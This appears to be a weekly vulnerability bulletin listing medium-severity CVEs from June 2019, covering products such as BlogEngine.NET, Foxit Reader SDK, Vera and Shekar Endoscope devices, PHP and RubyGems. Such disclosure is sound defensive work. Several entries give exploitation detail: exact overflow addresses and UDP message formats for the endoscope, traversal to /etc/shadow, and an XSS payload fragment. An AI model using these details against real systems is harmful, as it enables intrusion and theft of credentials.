afian — filerun FileRun 2019.05.21 allows XSS via the filename to the ?module=fileman&section=do&page=up URI. 2019-06-20 4.3 CVE-2019-12905
MISC alpinelinux — abuild Alpine Linux abuild through 3.4.0 allows an unprivileged member of the abuild group to add an untrusted package via a –keys-dir option that causes acceptance of an untrusted signing key. 2019-06-18 4.0 CVE-2019-12875
MISC
MISC alternate-tools — alternate_pic_view Alternate Pic View 2.600 has a User Mode Write AV starting at PicViewer!PerfgrapFinalize+0x00000000000a8868. 2019-06-19 5.0 CVE-2019-12893
MISC alternate-tools — alternate_pic_view Alternate Pic View 2.600 has a Read Access Violation at the Instruction Pointer after a call from PicViewer!PerfgrapFinalize+0x00000000000a9a1b. 2019-06-19 5.0 CVE-2019-12894
MISC alternate-tools — alternate_pic_view In Alternate Pic View 2.600, the Exception Handler Chain is Corrupted starting at PicViewer!PerfgrapFinalize+0x00000000000b916d. 2019-06-19 5.0 CVE-2019-12895
MISC apache — allura In Apache Allura prior to 1.11.0, a vulnerability exists for stored XSS on the user dropdown selector when creating or editing tickets. The XSS executes when a user engages with that dropdown on that page. 2019-06-18 4.3 CVE-2019-10085
BID
MISC
MLIST artha_project — artha Artha ~ The Open Thesaurus 1.0.3.0 has a Buffer Overflow. 2019-06-18 5.0 CVE-2018-18944
MISC
MISC b3log — solo b3log Solo 2.9.3 has XSS in the Input page under the “Publish Articles” menu with an ID of “articleTags” stored in the “tag” JSON field, which allows remote attackers to inject arbitrary Web scripts or HTML via a carefully crafted site name in an admin-authenticated HTTP request. 2019-06-20 4.3 CVE-2018-16248
MISC cisco — integrated_management_controller A vulnerability in the web-based management interface of Cisco Integrated Management Controller (IMC) could allow an unauthenticated, remote attacker to access potentially sensitive system usage information. The vulnerability is due to a lack of proper data protection mechanisms. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow an attacker to view sensitive system data. 2019-06-19 5.0 CVE-2019-1631
BID
CISCO cisco — prime_service_catalog A vulnerability in the web-based management interface of Cisco Prime Service Catalog Software could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack on an affected system. The vulnerability is due to insufficient CSRF protection mechanisms on the web-based management interface on an affected device. An attacker could exploit this vulnerability by persuading a user of the interface to follow a malicious link. A successful exploit could allow the attacker to perform arbitrary actions with the privilege level of the affected user. 2019-06-19 6.8 CVE-2019-1874
BID
CISCO cloudera — data_science_workbench An issue was discovered in Cloudera Data Science Workbench (CDSW) 1.2.x through 1.4.0. Unauthenticated users can get a list of user accounts. 2019-06-21 5.0 CVE-2018-15665
MISC
CONFIRM columbiaweather — weather_microserver_firmware In firmware version MS_2.6.9900 of Columbia Weather MicroServer, a readouts_rd.php directory traversal issue makes it possible to read any file present on the underlying operating system. 2019-06-18 5.0 CVE-2018-18876
MISC
MISC columbiaweather — weather_microserver_firmware In firmware version MS_2.6.9900 of Columbia Weather MicroServer, an authenticated web user can access an alternative configuration page config_main.php that allows manipulation of the device. 2019-06-18 6.5 CVE-2018-18877
MISC
MISC columbiaweather — weather_microserver_firmware In firmware version MS_2.6.9900 of Columbia Weather MicroServer, an authenticated web user can pipe commands directly to the underlying operating system as user input is not sanitized in networkdiags.php. 2019-06-18 6.5 CVE-2018-18879
MISC
MISC corel — paintshop_pro_2019 An issue was discovered in Corel PaintShop Pro 2019 21.0.0.119. An integer overflow in the jp2 parsing library allows an attacker to overwrite memory and to execute arbitrary code. 2019-06-19 6.8 CVE-2019-6114
MISC craftcms — craft_cms Craft CMS 3.1.30 has XSS. 2019-06-18 4.3 CVE-2019-12823
MISC
CONFIRM creatiwity — witycms A “search for user discovery” injection issue exists in Creatiwity wityCMS 0.6.2 via the “Utilisateur” menu. No input parameters are filtered, e.g., the /admin/user/users Nickname, email, firstname, lastname, and groupe parameters. 2019-06-20 4.0 CVE-2018-16251
MISC debian — debian_linux An issue was discovered in Open Ticket Request System (OTRS) 7.0.x through 7.0.7, Community Edition 6.0.x through 6.0.19, and Community Edition 5.0.x through 5.0.36. An attacker could send a malicious email to an OTRS system. If a logged-in agent user quotes it, the email could cause the browser to load external image resources. 2019-06-17 4.3 CVE-2019-12248
CONFIRM
MISC dotcms — dotcms dotCMS before 5.1.6 is vulnerable to a SQL injection that can be exploited by an attacker of the role Publisher via view_unpushed_bundles.jsp. 2019-06-18 6.5 CVE-2019-12872
MISC
MISC dotnetblogengine — blogengine.net BlogEngine.NET 3.3.7.0 and earlier allows XML External Entity Blind Injection, related to pingback.axd and BlogEngine.Core/Web/HttpHandlers/PingbackHandler.cs. 2019-06-21 5.0 CVE-2019-10718
MISC
MISC dotnetblogengine — blogengine.net BlogEngine.NET 3.3.7.0 and earlier allows Directory Traversal and Remote Code Execution because file creation is mishandled, related to /api/upload and BlogEngine.NET/AppCode/Api/UploadController.cs. NOTE: this issue exists because of an incomplete fix for CVE-2019-6714. 2019-06-21 6.5 CVE-2019-10719
MISC
FULLDISC
MISC dotnetblogengine — blogengine.net BlogEngine.NET 3.3.7.0 and earlier allows Directory Traversal and Remote Code Execution via the theme cookie to the File Manager. NOTE: this issue exists because of an incomplete fix for CVE-2019-6714. 2019-06-21 6.5 CVE-2019-10720
MISC
FULLDISC
MISC dotnetblogengine — blogengine.net BlogEngine.NET 3.3.7 and earlier allows XXE via an apml file to syndication.axd. 2019-06-21 5.0 CVE-2019-11392
MISC edrawsoft — edraw_max Edraw Max 7.9.3 has Heap Corruption starting at ntdll!RtlpNtMakeTemporaryKey+0x0000000000001a77. 2019-06-19 5.0 CVE-2019-12896
MISC edrawsoft — edraw_max Edraw Max 7.9.3 has a Read Access Violation at the Instruction Pointer after a call from ObjectModule!Paint::Clear+0x0000000000000074. 2019-06-19 5.0 CVE-2019-12897
MISC exacq — enterprise_system_manager A vulnerability in the exacqVision Enterprise System Manager (ESM) v5.12.2 application whereby unauthorized privilege escalation can potentially be achieved. This vulnerability impacts exacqVision ESM v5.12.2 and all prior versions of ESM running on a Windows operating system. This issue does not impact any Windows Server OSs, or Linux deployments with permissions that are not inherited from the root directory. Authorized Users have ?modify? permission to the ESM folders, which allows a low privilege account to modify files located in these directories. An executable can be renamed and replaced by a malicious file that could connect back to a bad actor providing system level privileges. A low privileged user is not able to restart the service, but a restart of the system would trigger the execution of the malicious file. This issue affects: Exacq Technologies, Inc. exacqVision Enterprise System Manager (ESM) Version 5.12.2 and prior versions; This issue does not affect: Exacq Technologies, Inc. exacqVision Enterprise System Manager (ESM) 19.03 and above. 2019-06-18 6.9 CVE-2019-7588
CONFIRM
MISC
MISC
CONFIRM f5 — big-ip_access_policy_manager Jonathan Looney discovered that the TCP retransmission queue implementation in tcp_fragment in the Linux kernel could be fragmented when handling certain TCP Selective Acknowledgment (SACK) sequences. A remote attacker could use this to cause a denial of service. This has been fixed in stable kernel releases 4.4.182, 4.9.182, 4.14.127, 4.19.52, 5.1.11, and is fixed in commit f070ef2ac66716357066b683fb0baf55f8191a2e. 2019-06-18 5.0 CVE-2019-11478
MISC
MISC
MISC
MISC
CONFIRM
CONFIRM
MISC
CERT-VN f5 — big-ip_access_policy_manager Jonathan Looney discovered that the Linux kernel default MSS is hard-coded to 48 bytes. This allows a remote peer to fragment TCP resend queues significantly more than if a larger MSS were enforced. A remote attacker could use this to cause a denial of service. This has been fixed in stable kernel releases 4.4.182, 4.9.182, 4.14.127, 4.19.52, 5.1.11, and is fixed in commits 967c05aee439e6e5d7d805e195b3a20ef5c433d6 and 5f3e2bf008c2221478101ee72f5cb4654b9fc363. 2019-06-18 5.0 CVE-2019-11479
BID
MISC
MISC
MISC
MISC
CONFIRM
CONFIRM
MISC
CERT-VN fasterxml — jackson-databind A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x through 2.9.9. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has JDOM 1.x or 2.x jar in the classpath, an attacker can send a specifically crafted JSON message that allows them to read arbitrary local files on the server. 2019-06-19 4.3 CVE-2019-12814
CONFIRM
MLIST
MLIST
MLIST
MLIST
MLIST foxitsoftware — foxit_pdf_sdk_activex A use after free in the TextBox field Validate action in IReader_ContentProvider can occur for specially crafted PDF files in Foxit Reader SDK (ActiveX) Professional 5.4.0.1031. An attacker can leverage this to gain remote code execution. Relative to CVE-2018-19452, this has a different free location and requires different JavaScript code for exploitation. 2019-06-17 6.8 CVE-2018-19444
MISC foxitsoftware — foxit_pdf_sdk_activex A command injection can occur for specially crafted PDF files in Foxit Reader SDK (ActiveX) Professional 5.4.0.1031 when the JavaScript API app.launchURL is used. An attacker can leverage this to gain remote code execution. 2019-06-17 6.8 CVE-2018-19445
MISC foxitsoftware — foxit_pdf_sdk_activex A File Write can occur for specially crafted PDF files in Foxit Reader SDK (ActiveX) Professional 5.4.0.1031 when the JavaScript API Doc.createDataObject is used. An attacker can leverage this to gain remote code execution. 2019-06-17 6.8 CVE-2018-19446
MISC foxitsoftware — foxit_pdf_sdk_activex A stack-based buffer overflow can occur for specially crafted PDF files in Foxit Reader SDK (ActiveX) 5.4.0.1031 when parsing the URI string. An attacker can leverage this to gain remote code execution. 2019-06-17 6.8 CVE-2018-19447
MISC foxitsoftware — foxit_pdf_sdk_activex In Foxit Reader SDK (ActiveX) Professional 5.4.0.1031, an uninitialized object in IReader_ContentProvider::GetDocEventHandler occurs when embedding the control into Office documents. By opening a specially crafted document, an attacker can trigger an out of bounds write condition, possibly leveraging this to gain remote code execution. 2019-06-17 6.8 CVE-2018-19448
MISC foxitsoftware — foxit_pdf_sdk_activex A File Write can occur for specially crafted PDF files in Foxit Reader SDK (ActiveX) Professional 5.4.0.1031 when the JavaScript API Doc.exportAsFDF is used. An attacker can leverage this to gain remote code execution. 2019-06-17 6.8 CVE-2018-19449
MISC foxitsoftware — foxit_pdf_sdk_activex A command injection can occur for specially crafted PDF files in Foxit Reader SDK (ActiveX) 5.4.0.1031 when parsing a launch action. An attacker can leverage this to gain remote code execution. 2019-06-17 6.8 CVE-2018-19450
MISC fusionpbx — fusionpbx app/operator_panel/index_inc.php in the Operator Panel module in FusionPBX 4.4.3 suffers from an information disclosure vulnerability due to excessive debug information, which allows authenticated administrative attackers to obtain credentials and other sensitive information. 2019-06-17 4.0 CVE-2019-11407
MISC
MISC fusionpbx — fusionpbx XSS in app/operator_panel/index_inc.php in the Operator Panel module in FusionPBX 4.4.3 allows remote unauthenticated attackers to inject arbitrary JavaScript characters by placing a phone call using a specially crafted caller ID number. This can further lead to remote code execution by chaining this vulnerability with a command injection vulnerability also present in FusionPBX. 2019-06-17 4.3 CVE-2019-11408
MISC
MISC
MISC fusionpbx — fusionpbx app/operator_panel/exec.php in the Operator Panel module in FusionPBX 4.4.3 suffers from a command injection vulnerability due to a lack of input validation that allows authenticated non-administrative attackers to execute commands on the host. This can further lead to remote code execution when combined with an XSS vulnerability also present in the FusionPBX Operator Panel module. 2019-06-17 6.5 CVE-2019-11409
MISC
MISC
MISC genieaccess — wip3bvaf_firmware Genie Access WIP3BVAF WISH IP 3MP IR Auto Focus Bullet Camera devices through 3.x are vulnerable to directory traversal via the web interface, as demonstrated by reading /etc/shadow. NOTE: this product is discontinued, and its final firmware version has this vulnerability (4.x versions exist only for other Genie Access products). 2019-06-17 5.0 CVE-2019-7315
MISC getvera — veraedge_firmware An issue was discovered on Vera VeraEdge 1.7.19 and Veralite 1.7.481 devices. The device provides a user with the capability of installing or deleting apps on the device using the web management interface. It seems that the device does not implement any cross-site request forgery protection mechanism which allows an attacker to trick a user who navigates to an attacker controlled page to install or delete an application on the device. Note: The cross-site request forgery is a systemic issue across all other functionalities of the device. 2019-06-17 6.8 CVE-2017-9381
MISC
MISC
BUGTRAQ getvera — veraedge_firmware An issue was discovered on Vera VeraEdge 1.7.19 and Veralite 1.7.481 devices. The device provides UPnP services that are available on port 3480 and can also be accessed via port 80 using the url “/port_3480”. It seems that the UPnP services provide “file” as one of the service actions for a normal user to read a file that is stored under the /etc/cmh-lu folder. It retrieves the value from the “parameters” query string variable and then passes it to an internal function “FileUtils::ReadFileIntoBuffer” which is a library function that does not perform any sanitization on the value submitted and this allows an attacker to use directory traversal characters “../” and read files from other folders within the device. 2019-06-17 4.0 CVE-2017-9382
MISC
MISC
BUGTRAQ getvera — veraedge_firmware An issue was discovered on Vera VeraEdge 1.7.19 and Veralite 1.7.481 devices. The device provides UPnP services that are available on port 3480 and can also be accessed via port 80 using the url “/port_3480”. It seems that the UPnP services provide “wget” as one of the service actions for a normal user to connect the device to an external website. It retrieves the parameter “URL” from the query string and then passes it to an internal function that uses the curl module on the device to retrieve the contents of the website. 2019-06-17 6.5 CVE-2017-9383
MISC
MISC
BUGTRAQ getvera — veraedge_firmware An issue was discovered on Vera Veralite 1.7.481 devices. The device has an additional OpenWRT interface in addition to the standard web interface which allows the highest privileges a user can obtain on the device. This web interface uses root as the username and the password in the /etc/cmh/cmh.conf file which can be extracted by an attacker using a directory traversal attack, and then log in to the device with the highest privileges. 2019-06-17 5.0 CVE-2017-9385
MISC
MISC
BUGTRAQ getvera — veraedge_firmware An issue was discovered on Vera VeraEdge 1.7.19 and Veralite 1.7.481 devices. The device provides a script file called “get_file.sh” which allows a user to retrieve any file stored in the “cmh-ext” folder on the device. However, the “filename” parameter is not validated correctly and this allows an attacker to directory traverse outside the /cmh-ext folder and read any file on the device. It is necessary to create the folder “cmh-ext” on the device which can be executed by an attacker first in an unauthenticated fashion and then execute a directory traversal attack. 2019-06-17 4.0 CVE-2017-9386
MISC
MISC
BUGTRAQ getvera — veraedge_firmware An issue was discovered on Vera VeraEdge 1.7.19 and Veralite 1.7.481 devices. The device provides a shell script called connect.sh which is supposed to return a specific cookie for the user when the user is authenticated to https://home.getvera.com. One of the parameters retrieved by this script is “RedirectURL”. However, the application lacks strict input validation of this parameter and this allows an attacker to execute the client-side code on this application. 2019-06-17 4.3 CVE-2017-9390
MISC
MISC
BUGTRAQ gnu — bash A heap-based buffer overflow exists in GNU Bash before 4.3 when wide characters, not supported by the current locale set in the LC_CTYPE environment variable, are printed through the echo built-in function. A local attacker, who can provide data to print through the “echo -e” built-in function, may use this flaw to crash a script or execute code with the privileges of the bash process. This occurs because ansicstr() in lib/sh/strtrans.c mishandles u32cconv(). 2019-06-18 4.6 CVE-2012-6711
MISC
BID
MISC google — android In publishKeyEvent, publishMotionEvent and sendUnchainedFinishedSignal of InputTransport.cpp, there are uninitialized data leading to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-7.0 Android-7.1.1 Android-7.1.2 Android-8.0 Android-8.1 Android-9Android ID: A-115739809 2019-06-19 4.9 CVE-2019-2004
MISC google — android In onPermissionGrantResult of GrantPermissionsActivity.java, there is a possible incorrectly granted permission due to a missing permission check. This could lead to local escalation of privilege on a locked device with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-8.0 Android-8.1 Android-9Android ID: A-68777217 2019-06-19 6.8 CVE-2019-2005
MISC i-doit — i-doit An XSS issue was discovered in i-doit Open 1.12 via the src/tools/php/qr/qr.php url parameter. 2019-06-18 4.3 CVE-2019-6965
MISC ibm — campaign IBM Campaign 9.1.2 and 10.1 could allow a remote attacker to traverse directories on the system. An attacker could send a specially-crafted URL request containing “dot dot” sequences (/../) to view arbitrary files on the system. IBM X-Force ID: 162172. 2019-06-19 4.0 CVE-2019-4384
XF
CONFIRM ibm — cloud_private IBM Cloud Private 2.1.0, 3.1.0, 3.1.1, and 3.1.2 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 158338. 2019-06-18 6.8 CVE-2019-4142
XF
CONFIRM ibm — cognos_controller IBM Cognos Controller 10.2.0, 10.2.1, 10.3.0, 10.3.1, and 10.4.0 could allow a remote attacker to obtain sensitive information, caused by a flaw in the HTTP OPTIONS method, aka Optionsbleed. By sending an OPTIONS HTTP request, a remote attacker could exploit this vulnerability to read secret data from process memory and obtain sensitive information. IBM X-Force ID: 158878. 2019-06-17 4.0 CVE-2019-4173
CONFIRM
XF ibm — cognos_controller IBM Cognos Controller 10.2.0, 10.2.1, 10.3.0, 10.3.1, and 10.4.0 could allow a remote attacker to bypass security restrictions, caused by an error related to insecure HTTP Methods. An attacker could exploit this vulnerability to gain access to the system. IBM X-Force ID: 158881. 2019-06-17 5.0 CVE-2019-4176
CONFIRM
XF ibm — infosphere_governance_catalog IBM InfoSphere Information Server 11.3, 11.5, and 11.7 is vulnerable to a XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 150905. 2019-06-17 5.5 CVE-2018-1845
XF
CONFIRM ibm — marketing_platform IBM Marketing Platform 9.1.0, 9.1.2, 10.0, and 10.1 exposes sensitive information in the headers that could be used by an authenticated attacker in further attacks against the system. IBM X-Force ID: 120906. 2019-06-19 4.0 CVE-2017-1107
XF
CONFIRM ishekar — endoscope_camera_firmware Recently it was discovered as a part of the research on IoT devices in the most recent firmware for Shekar Endoscope that any malicious user connecting to the device can change the default SSID and password thereby denying the owner an access to his/her own device. This device acts as an Endoscope camera that allows its users to use it in various industrial systems and settings, car garages, and also in some cases in the medical clinics to get access to areas that are difficult for a human being to reach. Any breach of this system can allow an attacker to get access to video feed and pictures viewed by that user and might allow them to get a foot hold in air gapped networks especially in case of nation critical infrastructure/industries. 2019-06-17 4.0 CVE-2017-10718
MISC
MISC
BUGTRAQ ishekar — endoscope_camera_firmware Recently it was discovered as a part of the research on IoT devices in the most recent firmware for Shekar Endoscope that the device has default Wi-Fi credentials that are exactly the same for every device. This device acts as an Endoscope camera that allows its users to use it in various industrial systems and settings, car garages, and also in some cases in the medical clinics to get access to areas that are difficult for a human being to reach. Any breach of this system can allow an attacker to get access to video feed and pictures viewed by that user and might allow them to get a foot hold in air gapped networks especially in case of nation critical infrastructure/industries. 2019-06-17 4.0 CVE-2017-10719
MISC
MISC
BUGTRAQ ishekar — endoscope_camera_firmware Recently it was discovered as a part of the research on IoT devices in the most recent firmware for Shekar Endoscope that the desktop application used to connect to the device suffers from a stack overflow if more than 26 characters are passed to it as the Wi-Fi name. This application is installed on the device and an attacker who can provide the right payload can execute code on the user’s system directly. Any breach of this system can allow an attacker to get access to all the data that the user has access too. The application uses a dynamic link library(DLL) called “avilib.dll” which is used by the application to send binary packets to the device that allow to control the device. One such action that the DLL provides is change password in the function “sendchangename” which allows a user to change the Wi-Fi name on the device. This function calls a sub function “sub_75876EA0” at address 0x758784F8. The function determines which action to execute based on the parameters sent to it. The “sendchangename” passes the datastring as the second argument which is the name we enter in the textbox and integer 1 as first argument. The rest of the 3 arguments are set to 0. The function “sub_75876EA0” at address 0x75876F19 uses the first argument received and to determine which block to jump to. Since the argument passed is 1, it jumps to 0x75876F20 and proceeds from there to address 0x75876F56 which calculates the length of the data string passed as the first parameter. This length and the first argument are then passed to the address 0x75877001 which calls the memmove function which uses a stack address as the destination where the password typed by us is passed as the source and length calculated above is passed as the number of bytes to copy which leads to a stack overflow. 2019-06-17 4.6 CVE-2017-10720
MISC
MISC
BUGTRAQ ishekar — endoscope_camera_firmware Recently it was discovered as a part of the research on IoT devices in the most recent firmware for Shekar Endoscope that the device has Telnet functionality enabled by default. This device acts as an Endoscope camera that allows its users to use it in various industrial systems and settings, car garages, and also in some cases in the medical clinics to get access to areas that are difficult for a human being to reach. Any breach of this system can allow an attacker to get access to video feed and pictures viewed by that user and might allow them to get a foot hold in air gapped networks especially in case of nation critical infrastructure/industries. 2019-06-17 4.0 CVE-2017-10721
MISC
MISC
BUGTRAQ ishekar — endoscope_camera_firmware Recently it was discovered as a part of the research on IoT devices in the most recent firmware for Shekar Endoscope that the desktop application used to connect to the device suffers from a stack overflow if more than 26 characters are passed to it as the Wi-Fi password. This application is installed on the device and an attacker who can provide the right payload can execute code on the user’s system directly. Any breach of this system can allow an attacker to get access to all the data that the user has access too. The application uses a dynamic link library(DLL) called “avilib.dll” which is used by the application to send binary packets to the device that allow to control the device. One such action that the DLL provides is change password in the function “sendchangepass” which allows a user to change the Wi-Fi password on the device. This function calls a sub function “sub_75876EA0” at address 0x7587857C. The function determines which action to execute based on the parameters sent to it. The “sendchangepass” passes the datastring as the second argument which is the password we enter in the textbox and integer 2 as first argument. The rest of the 3 arguments are set to 0. The function “sub_75876EA0” at address 0x75876F19 uses the first argument received and to determine which block to jump to. Since the argument passed is 2, it jumps to 0x7587718C and proceeds from there to address 0x758771C2 which calculates the length of the data string passed as the first parameter.This length and the first argument are then passed to the address 0x7587726F which calls a memmove function which uses a stack address as the destination where the password typed by us is passed as the source and length calculated above is passed as the number of bytes to copy which leads to a stack overflow. 2019-06-17 4.6 CVE-2017-10722
MISC
MISC
BUGTRAQ ishekar — endoscope_camera_firmware Recently it was discovered as a part of the research on IoT devices in the most recent firmware for Shekar Endoscope that an attacker connected to the device Wi-Fi SSID can exploit a memory corruption issue and execute remote code on the device. This device acts as an Endoscope camera that allows its users to use it in various industrial systems and settings, car garages, and also in some cases in the medical clinics to get access to areas that are difficult for a human being to reach. Any breach of this system can allow an attacker to get access to video feed and pictures viewed by that user and might allow them to get a foot hold in air gapped networks especially in case of nation critical infrastructure/industries. The firmware contains binary uvc_stream that is the UDP daemon which is responsible for handling all the UDP requests that the device receives. The client application sends a UDP request to change the Wi-Fi name which contains the following format: “SETCMD0001+0001+[2 byte length of wifiname]+[Wifiname]. This request is handled by “control_Dev_thread” function which at address “0x00409AE0” compares the incoming request and determines if the 10th byte is 01 and if it is then it redirects to 0x0040A74C which calls the function “setwifiname”. The function “setwifiname” uses a memcpy function but uses the length of the payload obtained by using strlen function as the third parameter which is the number of bytes to copy and this allows an attacker to overflow the function and control the $PC value. 2019-06-17 6.5 CVE-2017-10723
MISC
MISC
BUGTRAQ ishekar — endoscope_camera_firmware Recently it was discovered as a part of the research on IoT devices in the most recent firmware for Shekar Endoscope that an attacker connected to the device Wi-Fi SSID can exploit a memory corruption issue and execute remote code on the device. This device acts as an Endoscope camera that allows its users to use it in various industrial systems and settings, car garages, and also in some cases in the medical clinics to get access to areas that are difficult for a human being to reach. Any breach of this system can allow an attacker to get access to video feed and pictures viewed by that user and might allow them to get a foot hold in air gapped networks especially in case of nation critical infrastructure/industries. The firmware contains binary uvc_stream that is the UDP daemon which is responsible for handling all the UDP requests that the device receives. The client application sends a UDP request to change the Wi-Fi name which contains the following format: “SETCMD0001+0002+[2 byte length of wifipassword]+[Wifipassword]. This request is handled by “control_Dev_thread” function which at address “0x00409AE4” compares the incoming request and determines if the 10th byte is 02 and if it is then it redirects to 0x0040A7D8, which calls the function “setwifipassword”. The function “setwifipassword” uses a memcpy function but uses the length of the payload obtained by using strlen function as the third parameter which is the number of bytes to copy and this allows an attacker to overflow the function and control the $PC value. 2019-06-17 6.5 CVE-2017-10724
MISC
MISC
BUGTRAQ jspxcms — jspxcms In Jspxcms 9.0.0, a vulnerable URL routing implementation allows remote code execution after logging in as web admin. 2019-06-20 6.5 CVE-2018-16553
MISC
MISC kcodes — netusb.ko An exploitable arbitrary memory read vulnerability exists in the KCodes NetUSB.ko kernel module which enables the ReadySHARE Printer functionality of at least two NETGEAR Nighthawk Routers and potentially several other vendors/products. A specially crafted index value can cause an invalid memory read, resulting in a denial of service or remote information disclosure. An unauthenticated attacker can send a crafted packet on the local network to trigger this vulnerability. 2019-06-17 6.4 CVE-2019-5016
BID
MISC kcodes — netusb.ko An exploitable information disclosure vulnerability exists in the KCodes NetUSB.ko kernel module that enables the ReadySHARE Printer functionality of at least two NETGEAR Nighthawk Routers and potentially several other vendors/products. An unauthenticated, remote attacker can craft and send a packet containing an opcode that will trigger the kernel module to return several addresses. One of which can be used to calculate the dynamic base address of the module for further exploitation. 2019-06-17 5.0 CVE-2019-5017
BID
MISC linksys — wrt1900acs_firmware An issue was discovered on Linksys WRT1900ACS 1.0.3.187766 devices. An ability exists for an unauthenticated user to browse a confidential ui/1.0.99.187766/dynamic/js/setup.js.localized file on the router’s webserver, allowing for an attacker to identify possible passwords that the system uses to set the default guest network password. An attacker can use this list of 30 words along with a random 2 digit number to brute force their access onto a router’s guest network. 2019-06-17 5.0 CVE-2019-7579
MISC
MISC linux — linux_kernel i915_gem_userptr_get_pages in drivers/gpu/drm/i915/i915_gem_userptr.c in the Linux kernel 4.15.0 on Ubuntu 18.04.2 allows local users to cause a denial of service (NULL pointer dereference and BUG) or possibly have unspecified other impact via crafted ioctl calls to /dev/dri/card0. 2019-06-18 4.6 CVE-2019-12881
MISC misp — misp app/Model/Server.php in MISP 2.4.109 allows remote command execution by a super administrator because the PHP file_exists function is used with user-controlled entries, and phar:// URLs trigger deserialization. 2019-06-17 6.5 CVE-2019-12868
MISC my-netdata — netdata An issue was discovered in Netdata 1.10.0. JSON injection exists via the api/v1/data tqx parameter because of web_client_api_request_v1_data in web/api/web_api_v1.c. 2019-06-18 4.3 CVE-2018-18836
MISC
MISC
MISC
CONFIRM
MISC my-netdata — netdata An issue was discovered in Netdata 1.10.0. HTTP Header Injection exists via the api/v1/data filename parameter because of web_client_api_request_v1_data in web/api/web_api_v1.c. 2019-06-18 5.8 CVE-2018-18837
MISC
MISC
CONFIRM
MISC my-netdata — netdata An issue was discovered in Netdata 1.10.0. Log Injection (or Log Forgery) exists via a %0a sequence in the url parameter to api/v1/registry. 2019-06-18 5.0 CVE-2018-18838
MISC
CONFIRM
MISC my-netdata — netdata ** DISPUTED ** An issue was discovered in Netdata 1.10.0. Full Path Disclosure (FPD) exists via api/v1/alarms. NOTE: the vendor says “is intentional.” 2019-06-18 5.0 CVE-2018-18839
MISC
MISC
MISC nagios — nagios_xi An Insufficient Access Control vulnerability (leading to credential disclosure) in coreconfigsnapshot.php (aka configuration snapshot page) in Nagios XI before 5.5.4 allows remote attackers to gain access to configuration files containing confidential credentials. 2019-06-19 5.0 CVE-2018-17148
MISC ngahr — resourcelink NGA ResourceLink 20.0.2.1 allows local file inclusion. 2019-06-19 4.0 CVE-2018-18863
MISC open-xchange — open-xchange_appsuite OX App Suite 7.10.1 and earlier allows Information Exposure. 2019-06-18 5.0 CVE-2019-7159
MISC
MISC openfind — mail2000 An issue was discovered in Openfind Mail2000 v6 Webmail. XSS can occur via an ‘<object data=”data:text/html’ substring in an e-mail message (The vendor subsequently patched this). 2019-06-19 4.3 CVE-2019-9763
MISC otrs — otrs An issue was discovered in Open Ticket Request System (OTRS) 7.0.x through 7.0.8, Community Edition 6.0.x through 6.0.19, and Community Edition 5.0.x through 5.0.36. In the customer or external frontend, personal information of agents (e.g., Name and mail address) can be disclosed in external notes. 2019-06-17 5.0 CVE-2019-12497
MISC
CONFIRM php — php When using gdImageCreateFromXbm() function of PHP gd extension in PHP versions 7.1.x below 7.1.30, 7.2.x below 7.2.19 and 7.3.x below 7.3.6, it is possible to supply data that will cause the function to use the value of uninitialized variable. This may lead to disclosing contents of the stack that has been left there by previous code. 2019-06-18 5.0 CVE-2019-11038
CONFIRM php — php Function iconv_mime_decode_headers() in PHP versions 7.1.x below 7.1.30, 7.2.x below 7.2.19 and 7.3.x below 7.3.6 may perform out-of-buffer read due to integer overflow when parsing MIME headers. This may lead to information disclosure or crash. 2019-06-18 6.4 CVE-2019-11039
CONFIRM php — php When PHP EXIF extension is parsing EXIF information from an image, e.g. via exif_read_data() function, in PHP versions 7.1.x below 7.1.30, 7.2.x below 7.2.19 and 7.3.x below 7.3.6 it is possible to supply it with data what will cause it to read past the allocated buffer. This may lead to information disclosure or crash. 2019-06-18 6.4 CVE-2019-11040
CONFIRM radare — radare2 In radare2 through 3.5.1, cmd_mount in libr/core/cmd_mount.c has a double free for the ms command. 2019-06-17 4.3 CVE-2019-12865
MISC ranksol — live_call_support CSRF exists in server.php in Live Call Support Application 1.5 for adding an admin account. 2019-06-19 6.8 CVE-2018-17389
MISC
MISC ranksol — nimble_professional CSRF exists in Nimble Messaging Bulk SMS Marketing Application 1.0 for adding an admin account. 2019-06-19 6.8 CVE-2018-17387
MISC
MISC rubygems — rubygems An issue was discovered in RubyGems 2.6 and later through 3.0.2. Since Gem::UserInteraction#verbose calls say without escaping, escape sequence injection is possible. 2019-06-17 5.0 CVE-2019-8321
MISC rubygems — rubygems An issue was discovered in RubyGems 2.6 and later through 3.0.2. The gem owner command outputs the contents of the API response directly to stdout. Therefore, if the response is crafted, escape sequence injection may occur. 2019-06-17 5.0 CVE-2019-8322
MISC rubygems — rubygems An issue was discovered in RubyGems 2.6 and later through 3.0.2. Gem::GemcutterUtilities#with_response may output the API response to stdout as it is. Therefore, if the API side modifies the response, escape sequence injection may occur. 2019-06-17 5.0 CVE-2019-8323
MISC rubygems — rubygems An issue was discovered in RubyGems 2.6 and later through 3.0.2. A crafted gem with a multi-line name is not handled correctly. Therefore, an attacker could inject arbitrary code to the stub line of gemspec, which is eval-ed by code in ensure_loadable_spec during the preinstall check. 2019-06-17 6.8 CVE-2019-8324
MISC rubygems — rubygems An issue was discovered in RubyGems 2.6 and later through 3.0.2. Since Gem::CommandManager#run calls alert_error without escaping, escape sequence injection is possible. (There are many ways to cause an error.) 2019-06-17 5.0 CVE-2019-8325
MISC sahipro — sahi_pro An issue was discovered in Tyto Sahi Pro through 7.x.x and 8.0.0. A web reports module has “export to excel features” that are vulnerable to CSV injection. An attacker can embed Excel formulas inside an automation script that, when exported after execution, results in code execution. 2019-06-17 6.8 CVE-2018-20468
MISC sahipro — sahi_pro An issue was discovered in Tyto Sahi Pro through 7.x.x and 8.0.0. The logs web interface is vulnerable to stored XSS. 2019-06-17 4.3 CVE-2018-20472
MISC
